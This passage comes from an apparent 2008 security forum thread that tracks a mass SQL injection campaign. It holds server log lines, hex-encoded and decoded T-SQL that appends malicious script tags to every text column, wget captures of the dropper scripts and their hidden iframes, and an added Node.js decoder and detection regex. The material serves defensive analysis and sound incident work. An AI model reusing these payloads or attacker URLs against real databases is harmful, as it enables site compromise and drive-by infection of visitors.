a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');


Script link
Code: [Select]
--11:35:17--  http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288
           => `stat.php?id=1005288&web_id=1005288'
Resolving s135.cnzz.com... 219.232.241.139
Connecting to s135.cnzz.com[219.232.241.139]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460';
var cnzz_a=gc_cnzz("cnzz_a1005288");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="站长统计">站长统计</a>'); // 站长统计 = "webmaster statistics" (the cnzz.com counter's link text)
document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 05:29:36 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 17, 2008, 10:59:07 am
Further to my post of August 16, 2008, we had a total of 2,051 injection attempts involving this same script in the last 24 hours.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 18, 2008, 09:26:15 am
With reference to my post of August 16, 2008, we had a total of 1,552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 20, 2008, 09:59:36 am
New SQL injection attempt from sdo.1000mg.cn/csrss/w.js

Original encoded form
Code: [Select]
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!
372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The link returns a 500 Internal server error.
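The log entries posted in this thread (Orac's August 7, 9, 16 and 20 posts) all share one shape: a DECLARE @S CHAR(4000);SET @S=CAST(<hex> AS CHAR(4000));EXEC(@S) wrapper around a hex-encoded cursor that walks sysobjects/syscolumns and appends a <script src> to every text column. The Node.js script below is an added example, not code from the thread or from any of its posters: it unescapes a log line, pulls the hex literal out of the CAST(), decodes it and reports the injected script URL. The log line and payload it runs on are constructed here (hosts under example.invalid, not the real domains), and the UTF-16LE branch is an assumption covering CAST(... AS NVARCHAR(4000)) variants that this thread does not show.

```javascript
// Added example for this thread (not code from the MDL posters): decode the
// hex-encoded T-SQL payload seen in the injection log lines and report the
// <script src> it appends to every text column.  Runs under Node.js, no deps.

// Constructed payload with the same DECLARE/CURSOR/EXEC shape as the thread's
// decoded samples; the host is a placeholder, not one of the real domains.
const SAMPLE_PAYLOAD =
  "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR " +
  "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' " +
  "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor " +
  "FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN " +
  "exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>" +
  "<script src=\"http://dropper.example.invalid/csrss/w.js\"></script><!--'' " +
  "where '+@C+' not like ''%\"></title>" +
  "<script src=\"http://dropper.example.invalid/csrss/w.js\"></script><!--''')" +
  "FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor";

// Attacker side of the encoding: CAST(0x... AS CHAR(4000)) carries the payload
// as one hex literal so no quote, space or keyword appears in the URL itself.
function toHexLiteral(sql, utf16) {
  return "0x" + Buffer.from(sql, utf16 ? "utf16le" : "latin1").toString("hex").toUpperCase();
}

// Constructed Apache-style log line in the same form as the thread's samples
// (mixed-case keywords as in the August 16 sample).
function buildSampleLogLine(sql, utf16) {
  const cast = utf16 ? "NVARCHAR(4000)" : "CHAR(4000)";
  return "xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56 +0000] " +
    "\"GET /forum/viewtopic.php?t=14727';DeCLARE%20@S%20" + cast + ";SET%20@S=CAST(" +
    toHexLiteral(sql, utf16) + "%20AS%20" + cast + ");ExEC(@S); HTTP/1.1\" 403 523 \"-\" " +
    "\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"";
}

// Decode the hex literal.  The thread's samples are single-byte (CHAR); the
// NVARCHAR variant (assumed here, not shown in the thread) is UTF-16LE, which
// for ASCII text shows up as a 0x00 in every odd byte.
function decodeHexPayload(hex) {
  const buf = Buffer.from(hex.replace(/^0x/i, ""), "hex");
  const looksUtf16 = buf.length >= 4 && buf[1] === 0 && buf[3] === 0;
  return buf.toString(looksUtf16 ? "utf16le" : "latin1");
}

// Undo %XX escaping without decodeURIComponent, which throws on a stray '%'.
function unescapeUrl(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Case-insensitive on purpose: the attacker already varies case (DeCLARE, ExEC),
// so a signature keyed on the literal "DECLARE @S" misses those requests.
const CAST_EXEC =
  /SET\s+@\w+\s*=\s*CAST\(\s*(?:0x)?([0-9A-Fa-f]{8,})\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\s*\)\s*;?\s*EXEC\s*\(/i;

// Returns null for a benign line, otherwise the decoded SQL and what it injects.
function analyzeLogLine(line) {
  const m = CAST_EXEC.exec(unescapeUrl(line));
  if (!m) return null;
  const sql = decodeHexPayload(m[1]);
  const src = /<script\s+src=["']?([^"'>\s]+)/i.exec(sql);
  return {
    sql,
    injectedSrc: src ? src[1] : null,
    // the cursor over sysobjects/syscolumns is what makes this hit every text column
    walksAllTextColumns: /sysobjects\s+\w+\s*,\s*syscolumns/i.test(sql),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const utf16 of [false, true]) {
    const r = analyzeLogLine(buildSampleLogLine(SAMPLE_PAYLOAD, utf16));
    console.log(utf16 ? "NVARCHAR" : "CHAR", "->", r.injectedSrc, r.walksAllTextColumns);
  }
}
```

Decoding the hex rather than matching on it is what makes the injected hostname visible for blocklisting: the hex literal changes with every new script domain while the surrounding SET @S=CAST(... AS CHAR(4000));EXEC(@S) wrapper stays the same, so the wrapper is the stable signature and the decoded payload is where the indicator lives.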
Title: Re: SQL Injected jscript sites
Post by: Orac on August 21, 2008, 11:11:43 am
New SQL injection; we've seen 418 separate injection attempts involving the script within the last 24 hours.



Sample Log entry, IP obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"!
></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

We've also seen a second version of this script; differences as follows
Code: [Select]
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!
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor




Code: [Select]
--11:38:09--  http://www2.1000ylc.cn/csrss/w.js
           => `w.js'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/notnew.htm></iframe>");

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Code: [Select]
--11:39:44--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500



Code: [Select]
--11:40:21--  http://www2.1000ylc.cn/csrss/new.htm
           => `new.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--11:41:56--  http://www2.1000ylc.cn/csrss/notnew.htm
           => `notnew.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2087412.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>





Code: [Select]
--11:43:17--  http://s96.cnzz.com/stat.php
           => `stat.php'
Resolving s96.cnzz.com... 219.232.243.5
Connecting to s96.cnzz.com[219.232.243.5]:80... connected
HTTP request sent, awaiting response... 200 OK

This returned a 0-byte page.


Code: [Select]
--11:44:38--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');



Code: [Select]
--11:46:04--  http://js.users.51.la/2087412.js
           => `2087412.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');

Title: Re: SQL Injected jscript sites
Post by: Orac on August 22, 2008, 11:12:17 am
Sample Log entry, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--11:43:29--  http://www0.douhunqn.cn/csrss/w.js
           => `w.js'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--11:45:34--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>


Code: [Select]
--11:48:08--  http://www0.douhunqn.cn/csrss/new.htm
           => `new.htm'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--11:51:03--  http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
           => `stat.php?id=1019605&web_id=1019605'
Resolving s96.cnzz.com... 219.232.241.133
Connecting to s96.cnzz.com[219.232.241.133]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
